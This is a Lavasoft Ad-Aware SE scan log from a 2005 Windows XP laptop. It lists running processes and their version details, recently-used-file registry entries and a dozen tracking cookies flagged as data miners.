»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

#:1 [smss.exe]
FilePath : \SystemRoot\System32\
ProcessID : 856
ThreadCreationTime : 2-15-2005 11:20:08 PM
BasePriority : Normal


#:2 [csrss.exe]
FilePath : \??\C:\WINDOWS\system32\
ProcessID : 932
ThreadCreationTime : 2-15-2005 11:20:10 PM
BasePriority : Normal


#:3 [winlogon.exe]
FilePath : \??\C:\WINDOWS\system32\
ProcessID : 956
ThreadCreationTime : 2-15-2005 11:20:12 PM
BasePriority : High


#:4 [services.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 1000
ThreadCreationTime : 2-15-2005 11:20:13 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Services and Controller app
InternalName : services.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : services.exe

#:5 [lsass.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 1012
ThreadCreationTime : 2-15-2005 11:20:13 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : LSA Shell (Export Version)
InternalName : lsass.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : lsass.exe

#:6 [ibmpmsvc.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1176
ThreadCreationTime : 2-15-2005 11:20:13 PM
BasePriority : Normal


#:7 [svchost.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 1252
ThreadCreationTime : 2-15-2005 11:20:15 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Generic Host Process for Win32 Services
InternalName : svchost.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : svchost.exe

#:8 [svchost.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 1296
ThreadCreationTime : 2-15-2005 11:20:16 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Generic Host Process for Win32 Services
InternalName : svchost.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : svchost.exe

#:9 [svchost.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1332
ThreadCreationTime : 2-15-2005 11:20:16 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Generic Host Process for Win32 Services
InternalName : svchost.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : svchost.exe

#:10 [s24evmon.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1416
ThreadCreationTime : 2-15-2005 11:20:17 PM
BasePriority : Normal
FileVersion : 3.1.8.0
ProductVersion : 4.0.0.0
ProductName : Mobile Unit Support Service
CompanyName : Intel Corporation
FileDescription : Event Monitor - Supports driver extensions to NIC Driver for wireless adapters.
InternalName : S24EvMon
LegalCopyright : Copyright © 2001 - 2003 Intel Corporation, 1997 - 2001 Symbol Technologies, Inc. Portions Copyright © MIT
OriginalFilename : S24EvMon.exe

#:11 [svchost.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1568
ThreadCreationTime : 2-15-2005 11:20:19 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Generic Host Process for Win32 Services
InternalName : svchost.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : svchost.exe

#:12 [svchost.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1612
ThreadCreationTime : 2-15-2005 11:20:19 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Generic Host Process for Win32 Services
InternalName : svchost.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : svchost.exe

#:13 [spoolsv.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 1908
ThreadCreationTime : 2-15-2005 11:20:22 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Spooler SubSystem App
InternalName : spoolsv.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : spoolsv.exe

#:14 [aolacsd.exe]
FilePath : C:\Program Files\Common Files\AOL\ACS\
ProcessID : 412
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 3.0.0.1
ProductVersion : 3.0.0.1
ProductName : AOL Connectivity Service
CompanyName : America Online
FileDescription : AOL Connectivity Service
InternalName : AOLacsd
LegalCopyright : Copyright © 2004 America Online
OriginalFilename : AOLacsd.exe

#:15 [aoltsmon.exe]
FilePath : C:\Program Files\Common Files\AOL\TopSpeed\2.0\
ProcessID : 428
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 2, 0, 0, 0
ProductVersion : 2, 0, 0, 0
ProductName : AOL TopSpeed(TM) Monitor
CompanyName : America Online, Inc
FileDescription : AOL TopSpeed(TM) Monitor
InternalName : AOL TopSpeed(TM) Monitor
LegalCopyright : Copyright © 2004 America Online, Inc.
OriginalFilename : aoltsmon.exe

#:16 [ati2evxx.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 484
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal


#:17 [kodakccs.exe]
FilePath : C:\WINDOWS\system32\drivers\
ProcessID : 516
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 1.1.5100.0
ProductVersion : 4.3.3.1
ProductName : Kodak DC File System Driver (Win32)
CompanyName : Eastman Kodak Company
FileDescription : Kodak DC Ring 3 Conduit (Win32)
InternalName : KodakCCS.exe
LegalCopyright : Copyright (C) Eastman Kodak Co. 2000-2004
OriginalFilename : DcFsSvc.exe

#:18 [aoltpspd.exe]
FilePath : C:\Program Files\Common Files\AOL\TopSpeed\2.0\
ProcessID : 528
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 2, 0, 0, 0
ProductVersion : 2, 0, 0, 0
ProductName : AOL TopSpeed(TM)
CompanyName : America Online Inc
FileDescription : AOL TopSpeed(TM)
InternalName : AOL TopSpeed(TM) Loader
LegalCopyright : Copyright © 2003-2004
LegalTrademarks : AOL TopSpeed(TM)
OriginalFilename : aoltpspd.exe

#:19 [mcvsrte.exe]
FilePath : c:\PROGRA~1\mcafee.com\vso\
ProcessID : 568
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 8, 0, 0, 12
ProductVersion : 8, 0, 0, 0
ProductName : McAfee VirusScan
CompanyName : Networks Associates Technology, Inc
FileDescription : McAfee VirusScan Real-time Engine
InternalName : mcvsrte
LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
OriginalFilename : mcvsrte.exe
Comments : McAfee VirusScan Real-time Engine

#:20 [mdm.exe]
FilePath : C:\Program Files\Common Files\Microsoft Shared\VS7Debug\
ProcessID : 584
ThreadCreationTime : 2-15-2005 11:20:31 PM
BasePriority : Normal
FileVersion : 7.10.3077
ProductVersion : 7.10.3077
ProductName : Microsoft® Visual Studio .NET
CompanyName : Microsoft Corporation
FileDescription : Machine Debug Manager
InternalName : mdm.exe
LegalCopyright : Copyright© Microsoft Corporation. All rights reserved.
OriginalFilename : mdm.exe

#:21 [qconsvc.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 672
ThreadCreationTime : 2-15-2005 11:20:32 PM
BasePriority : Normal


#:22 [regsrvc.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 732
ThreadCreationTime : 2-15-2005 11:20:32 PM
BasePriority : Normal
FileVersion : 4, 0, 0, 1
ProductVersion : 4, 0, 0, 1
ProductName : RegSrvc Module
CompanyName : Intel Corporation
FileDescription : RegSrvc Module
InternalName : RegSrvc
LegalCopyright : Copyright © 2002 - 2003 Intel Corporation
OriginalFilename : RegSrvc.EXE

#:23 [scsiaccess.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 772
ThreadCreationTime : 2-15-2005 11:20:32 PM
BasePriority : Normal


#:24 [tpkmpsvc.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 820
ThreadCreationTime : 2-15-2005 11:20:32 PM
BasePriority : Normal


#:25 [wanmpsvc.exe]
FilePath : C:\WINDOWS\
ProcessID : 872
ThreadCreationTime : 2-15-2005 11:20:32 PM
BasePriority : Normal
FileVersion : 9, 0, 0, 0
ProductVersion : 9, 0, 0, 0
ProductName : America Online
CompanyName : America Online, Inc.
FileDescription : Wan Miniport (ATW) Service
InternalName : WanMPSvc
LegalCopyright : Copyright © 2001 America Online, Inc.
OriginalFilename : WanMPSvc.exe

#:26 [mcshield.exe]
FilePath : c:\PROGRA~1\mcafee.com\vso\
ProcessID : 1440
ThreadCreationTime : 2-15-2005 11:20:33 PM
BasePriority : High


#:27 [alg.exe]
FilePath : C:\WINDOWS\System32\
ProcessID : 1732
ThreadCreationTime : 2-15-2005 11:20:35 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Application Layer Gateway Service
InternalName : ALG.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : ALG.exe

#:28 [explorer.exe]
FilePath : C:\WINDOWS\
ProcessID : 1576
ThreadCreationTime : 2-15-2005 11:20:53 PM
BasePriority : Normal
FileVersion : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 6.00.2900.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Windows Explorer
InternalName : explorer
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : EXPLORER.EXE

#:29 [syntplpr.exe]
FilePath : C:\Program Files\Synaptics\SynTP\
ProcessID : 2076
ThreadCreationTime : 2-15-2005 11:20:57 PM
BasePriority : Normal
FileVersion : 7.5.17.5 31Jul03
ProductVersion : 7.5.17.5 31Jul03
ProductName : Progressive Touch
CompanyName : Synaptics, Inc.
FileDescription : TouchPad Driver Helper Application
InternalName : SynTPLpr
LegalCopyright : Copyright (C) Synaptics, Inc. 1996-2003
OriginalFilename : SynTPLpr.exe

#:30 [syntpenh.exe]
FilePath : C:\Program Files\Synaptics\SynTP\
ProcessID : 2156
ThreadCreationTime : 2-15-2005 11:20:57 PM
BasePriority : Normal
FileVersion : 7.5.17.5 31Jul03
ProductVersion : 7.5.17.5 31Jul03
ProductName : Progressive Touch
CompanyName : Synaptics, Inc.
FileDescription : Synaptics TouchPad Enhancements
InternalName : Scrolleroo
LegalCopyright : Copyright (C) Synaptics, Inc. 1996-2003
OriginalFilename : SynTPEnh.exe

#:31 [tphkmgr.exe]
FilePath : C:\PROGRA~1\ThinkPad\PkgMgr\HOTKEY\
ProcessID : 2184
ThreadCreationTime : 2-15-2005 11:20:57 PM
BasePriority : Normal


#:32 [rundll32.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 2204
ThreadCreationTime : 2-15-2005 11:20:58 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : Run a DLL as an App
InternalName : rundll
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : RUNDLL.EXE

#:33 [tp98tray.exe]
FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
ProcessID : 2236
ThreadCreationTime : 2-15-2005 11:20:58 PM
BasePriority : Normal
FileVersion : 1, 0, 0, 0
ProductVersion : 1, 0, 0, 0
ProductName : IBM ThinkPad Tray Utility
CompanyName : IBM Corp.
FileDescription : IBM ThinkPad Tray Utility
InternalName : IBM ThinkPad Tray Utility
LegalCopyright : Copyright (C) IBM Corp. 1998,2002.
OriginalFilename : Tp98Tray.exe

#:34 [qcwlicon.exe]
FilePath : C:\Program Files\ThinkPad\ConnectUtilities\
ProcessID : 2264
ThreadCreationTime : 2-15-2005 11:20:58 PM
BasePriority : Normal


#:35 [tponscr.exe]
FilePath : C:\Program Files\ThinkPad\PkgMgr\HOTKEY\
ProcessID : 2360
ThreadCreationTime : 2-15-2005 11:21:00 PM
BasePriority : Normal


#:36 [tpscrex.exe]
FilePath : C:\Program Files\ThinkPad\PkgMgr\HOTKEY_1\
ProcessID : 2384
ThreadCreationTime : 2-15-2005 11:21:00 PM
BasePriority : Normal
FileVersion : 1.06
ProductVersion : 1.06
ProductName : ThinkPad UltraZoom
CompanyName : IBM Corporation
FileDescription : ThinkPad UltraZoom
InternalName : TPSCREX
LegalCopyright : Copyright (c) 2000, IBM Corporation
OriginalFilename : TpScrEx.exe

#:37 [npdtray.exe]
FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
ProcessID : 2624
ThreadCreationTime : 2-15-2005 11:21:04 PM
BasePriority : Normal
FileVersion : 1, 0, 0, 0
ProductVersion : 1, 0, 0, 0
ProductName : IBM ThinkPad Utility
CompanyName : IBM Corp.
FileDescription : IBM ThinkPad Presentation Director Tray Utility
InternalName : IBM ThinkPad Presentation Director Tray Utility
LegalCopyright : Copyright (C) IBM Corp. 2000,2002
OriginalFilename : NPDTray.EXE

#:38 [ezejmnap.exe]
FilePath : C:\PROGRA~1\ThinkPad\UTILIT~1\
ProcessID : 2652
ThreadCreationTime : 2-15-2005 11:21:05 PM
BasePriority : Normal
FileVersion : 1, 0, 0, 0
ProductVersion : 1, 0, 0, 0
ProductName : IBM ThinkPad EasyEject Support Application
CompanyName : IBM Corp.
FileDescription : IBM ThinkPad EasyEject Support Application
InternalName : IBM ThinkPad EasyEject Support Application
LegalCopyright : Copyright (C) IBM Corp., 2002.
OriginalFilename : EzEjMnAp.EXE

#:39 [r3proxy.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 2692
ThreadCreationTime : 2-15-2005 11:21:06 PM
BasePriority : Normal
FileVersion : 2.1.0.2
ProductVersion : 2.1.0.2
ProductName : Fellowes EasyPoint Mouse Software
CompanyName : Fellowes, Inc.
FileDescription : Fellowes EasyPoint Proxy Server
InternalName : R3Proxy.exe
LegalCopyright : Copyright© Fellowes, Inc. 2002-2004
OriginalFilename : R3Proxy.exe

#:40 [aoldial.exe]
FilePath : C:\Program Files\Common Files\AOL\ACS\
ProcessID : 2708
ThreadCreationTime : 2-15-2005 11:21:06 PM
BasePriority : Normal
FileVersion : 3.0.0.1
ProductVersion : 3.0.0.1
ProductName : AOL Connectivity Service
CompanyName : America Online
FileDescription : AOL Connectivity Service Dialer
InternalName : AOLdial
LegalCopyright : Copyright © 2004 America Online
OriginalFilename : AOLdial.exe

#:41 [aolsp scheduler.exe]
FilePath : C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\
ProcessID : 2716
ThreadCreationTime : 2-15-2005 11:21:07 PM
BasePriority : Normal
FileVersion : 1, 0, 0, 74
ProductVersion : 1, 0, 0, 74
ProductName : AOLSP Scheduler
FileDescription : AOLSP Scheduler
InternalName : AOLSP Scheduler
LegalCopyright : Copyright (C) America Online, Inc. 2004
OriginalFilename : AOLSP Scheduler.exe

#:42 [mcvsshld.exe]
FilePath : C:\PROGRA~1\mcafee.com\vso\
ProcessID : 2732
ThreadCreationTime : 2-15-2005 11:21:08 PM
BasePriority : Normal
FileVersion : 8, 0, 0, 15
ProductVersion : 8, 0, 0, 0
ProductName : McAfee VirusScan
CompanyName : Networks Associates Technology, Inc
FileDescription : McAfee VirusScan ActiveShield Resource
InternalName : msvcshld
LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
OriginalFilename : mcvsshld.exe
Comments : McAfee VirusScan ActiveShield Resource

#:43 [mcagent.exe]
FilePath : C:\PROGRA~1\mcafee.com\agent\
ProcessID : 2780
ThreadCreationTime : 2-15-2005 11:21:09 PM
BasePriority : Normal
FileVersion : 4, 3, 0, 10
ProductVersion : 4, 3, 0, 0
ProductName : McAfee SecurityCenter
CompanyName : Networks Associates Technology, Inc
FileDescription : McAfee SecurityCenter Agent
InternalName : mcagent
LegalCopyright : Copyright © 1998-2002 Networks Associates Technology, Inc.
OriginalFilename : mcagent.exe

#:44 [mcvsescn.exe]
FilePath : c:\progra~1\mcafee.com\vso\
ProcessID : 2828
ThreadCreationTime : 2-15-2005 11:21:10 PM
BasePriority : Normal
FileVersion : 8, 0, 0, 30
ProductVersion : 8, 0, 0, 0
ProductName : McAfee VirusScan
CompanyName : Networks Associates Technology, Inc
FileDescription : McAfee VirusScan E-mail Scan Module
InternalName : mcvsescn
LegalCopyright : Copyright © 1998-2003 Networks Associates Technology, Inc
OriginalFilename : mcvsescn.EXE
Comments : McAfee VirusScan E-mail Scan Module

#:45 [ibmmessages.exe]
FilePath : C:\Program Files\IBM\Messages By IBM\
ProcessID : 2972
ThreadCreationTime : 2-15-2005 11:21:13 PM
BasePriority : Normal


#:46 [jusched.exe]
FilePath : C:\Program Files\Java\j2re1.4.2_06\bin\
ProcessID : 2980
ThreadCreationTime : 2-15-2005 11:21:14 PM
BasePriority : Normal


#:47 [aolhos~1.exe]
FilePath : C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\
ProcessID : 3140
ThreadCreationTime : 2-15-2005 11:21:17 PM
BasePriority : Normal
FileVersion : 1.0.0.6
ProductVersion : 1.0.0.6
ProductName : AOL Service Libraries
CompanyName : America Online, Inc.
FileDescription : AOLHostManager Service
InternalName : AOLHostManager
LegalCopyright : © 2004 America Online, Inc.
OriginalFilename : AOLHostManager.exe

#:48 [realplay.exe]
FilePath : C:\Program Files\Real\RealPlayer\
ProcessID : 3148
ThreadCreationTime : 2-15-2005 11:21:17 PM
BasePriority : Normal
FileVersion : 6.0.9.584
ProductVersion : 6.0.9.584
ProductName : RealPlayer (32-bit)
CompanyName : RealNetworks, Inc.
FileDescription : RealPlayer
InternalName : REALPLAY
LegalCopyright : Copyright © RealNetworks, Inc. 1995-2000
LegalTrademarks : RealAudio(tm) is a trademark of RealNetworks, Inc.
OriginalFilename : REALPLAY.EXE

#:49 [sinstantm.exe]
FilePath : C:\WINDOWS\system32\
ProcessID : 3772
ThreadCreationTime : 2-15-2005 11:21:35 PM
BasePriority : Normal


#:50 [aolservicehost.exe]
FilePath : C:\PROGRA~1\COMMON~1\AOL\110083~1\EE\
ProcessID : 3796
ThreadCreationTime : 2-15-2005 11:21:35 PM
BasePriority : Normal
FileVersion : 1.0.0.6
ProductVersion : 1.0.0.6
ProductName : AOL Service Libraries
CompanyName : America Online, Inc.
FileDescription : AOLServiceHost Service
InternalName : AOLServiceHost
LegalCopyright : © 2004 America Online, Inc.
OriginalFilename : AOLServiceHost.exe

#:51 [wmiprvse.exe]
FilePath : C:\WINDOWS\System32\wbem\
ProcessID : 3440
ThreadCreationTime : 2-15-2005 11:22:07 PM
BasePriority : Normal
FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
ProductVersion : 5.1.2600.2180
ProductName : Microsoft® Windows® Operating System
CompanyName : Microsoft Corporation
FileDescription : WMI
InternalName : Wmiprvse.exe
LegalCopyright : © Microsoft Corporation. All rights reserved.
OriginalFilename : Wmiprvse.exe

#:52 [ad-aware.exe]
FilePath : C:\Program Files\Lavasoft\Ad-Aware SE Personal\
ProcessID : 2940
ThreadCreationTime : 2-16-2005 6:30:02 AM
BasePriority : Normal
FileVersion : 6.2.0.206
ProductVersion : VI.Second Edition
ProductName : Lavasoft Ad-Aware SE
CompanyName : Lavasoft Sweden
FileDescription : Ad-Aware SE Core application
InternalName : Ad-Aware.exe
LegalCopyright : Copyright © Lavasoft Sweden
OriginalFilename : Ad-Aware.exe
Comments : All Rights Reserved

#:53 [waol.exe]
FilePath : C:\Program Files\America Online 9.0a\
ProcessID : 2808
ThreadCreationTime : 2-16-2005 6:39:24 AM
BasePriority : Idle

Memory scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 0
Objects found so far: 0

Started registry scan
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Registry Scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 0
Objects found so far: 0

Started deep registry scan
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Deep registry scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 0
Objects found so far: 0

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\wordpad\recent file list
Description : list of recent files opened using wordpad

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\paint\recent file list
Description : list of files recently opened using microsoft paint

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\runmru
Description : mru list for items opened in start | run

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\search assistant\acmru
Description : list of recent search terms used with the search assistant

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\comdlg32\opensavemru
Description : list of recently saved files, stored according to file extension

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\comdlg32\lastvisitedmru
Description : list of recent programs opened

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\explorer\recentdocs
Description : list of recent documents opened

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\terminal server client\default
Description : list of recent systems connected to using remote desktop / terminal services

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\powerpoint\recent file list
Description : list of recent files used by microsoft powerpoint

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\common\open find\microsoft office word\settings\save as\file name mru
Description : list of recent documents saved by microsoft word

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\publisher\recent file list
Description : list of recent files used by microsoft publisher

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\access\settings
Description : list of recently opened documents in microsoft access

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\player\recentfilelist
Description : list of recently used files in microsoft windows media player

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\internet explorer
Description : last download directory used in microsoft internet explorer

MRU List Object Recognized!
Location: : software\microsoft\directdraw\mostrecentapplication
Description : most recent application to use microsoft directdraw

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\microsoft management console\recent file list
Description : list of recent snap-ins used in the microsoft management console

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\internet explorer\typedurls
Description : list of recently entered addresses in microsoft internet explorer

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\adobe\acrobat reader\5.0\avgeneral\crecentfiles
Description : list of recently used files in adobe reader


MRU List Object Recognized!
Location: : software\microsoft\direct3d\mostrecentapplication
Description : most recent application to use microsoft direct3d

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\preferences
Description : last playlist index loaded in microsoft windows media player

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows\currentversion\applets\regedit
Description : last key accessed using the microsoft registry editor

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\mediaplayer\preferences
Description : last playlist loaded in microsoft windows media player

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\common\general
Description : list of recently used symbols in microsoft office

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\office\11.0\powerpoint\recent typeface list
Description : list of recently used typefaces in microsoft powerpoint

MRU List Object Recognized!
Location: : software\microsoft\direct3d\mostrecentapplication
Description : most recent application to use microsoft direct X

MRU List Object Recognized!
Location: : S-1-5-21-402350127-190368106-1736902927-1004\software\microsoft\windows media\wmsdk\general
Description : windows media sdk

MRU List Object Recognized!
Location: : C:\Documents and Settings\Matt\Application Data\microsoft\office\recent
Description : list of recently opened documents using microsoft office

MRU List Object Recognized!
Location: : C:\Documents and Settings\Matt\recent
Description : list of recently opened documents

Started Tracking Cookie scan
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@server.iad.liveperson[2].txt[/email]
Category : Data Miner
Comment : Hits:12
Value : Cookie:matt@server.iad.liveperson.net/
Expires : 2-15-2006 1:59:46 PM
LastSync : Hits:12
UseCount : 0
Hits : 12

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@atdmt[1].txt[/email]
Category : Data Miner
Comment : Hits:1
Value : Cookie:matt@atdmt.com/
Expires : 2-12-2010 6:00:00 PM
LastSync : Hits:1
UseCount : 0
Hits : 1

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@statcounter[1].txt[/email]
Category : Data Miner
Comment : Hits:1
Value : Cookie:matt@statcounter.com/
Expires : 2-14-2010 4:51:40 PM
LastSync : Hits:1
UseCount : 0
Hits : 1

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@counter2.hitslink[2].txt[/email]
Category : Data Miner
Comment : Hits:8
Value : Cookie:matt@counter2.hitslink.com/
Expires : 1-17-2038 11:00:00 PM
LastSync : Hits:8
UseCount : 0
Hits : 8

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@2o7[1].txt[/email]
Category : Data Miner
Comment : Hits:3
Value : Cookie:matt@2o7.net/
Expires : 2-12-2010 12:17:08 PM
LastSync : Hits:3
UseCount : 0
Hits : 3

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@advertising[1].txt[/email]
Category : Data Miner
Comment : Hits:4
Value : Cookie:matt@advertising.com/
Expires : 2-14-2010 9:04:30 AM
LastSync : Hits:4
UseCount : 0
Hits : 4

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@S111319[1].txt[/email]
Category : Data Miner
Comment : Hits:4
Value : Cookie:matt@statse.webtrendslive.com/S111319
Expires : 12-31-2020 2:00:00 AM
LastSync : Hits:4
UseCount : 0
Hits : 4

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@servedby.advertising[2].txt[/email]
Category : Data Miner
Comment : Hits:21
Value : Cookie:matt@servedby.advertising.com/
Expires : 3-17-2005 9:04:30 AM
LastSync : Hits:21
UseCount : 0
Hits : 21

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@hitbox[1].txt[/email]
Category : Data Miner
Comment : Hits:3
Value : Cookie:matt@hitbox.com/
Expires : 2-15-2006 8:30:24 AM
LastSync : Hits:3
UseCount : 0
Hits : 3

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@mediaplex[1].txt[/email]
Category : Data Miner
Comment : Hits:2
Value : Cookie:matt@mediaplex.com/
Expires : 6-21-2009 6:00:00 PM
LastSync : Hits:2
UseCount : 0
Hits : 2

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@dcsgcxwngpifwznfzlmv83o6w_5w4m[2].txt[/email]
Category : Data Miner
Comment : Hits:3
Value : Cookie:matt@statse.webtrendslive.com/dcsgcxwngpifwznfzlmv83o6w_5w4m
Expires : 2-11-2015 6:18:26 PM
LastSync : Hits:3
UseCount : 0
Hits : 3

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]matt@ehg-cbs.hitbox[1].txt[/email]
Category : Data Miner
Comment : Hits:1
Value : Cookie:matt@ehg-cbs.hitbox.com/
Expires : 2-15-2006 8:30:24 AM
LastSync : Hits:1
UseCount : 0
Hits : 1

Tracking cookie scan result:
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 12
Objects found so far: 40

Deep scanning and examining files (C:)
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»

Tracking Cookie Object Recognized!
Type : IECache Entry
Data : [email]natalie@atdmt[2].txt[/email]
Category : Data Miner
Comment :
Value : C:\Documents and Settings\Natalie\Cookies\natalie@atdmt[2].txt

Disk Scan Result for C:\
»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»
New critical objects: 0
Objects found so far: 41


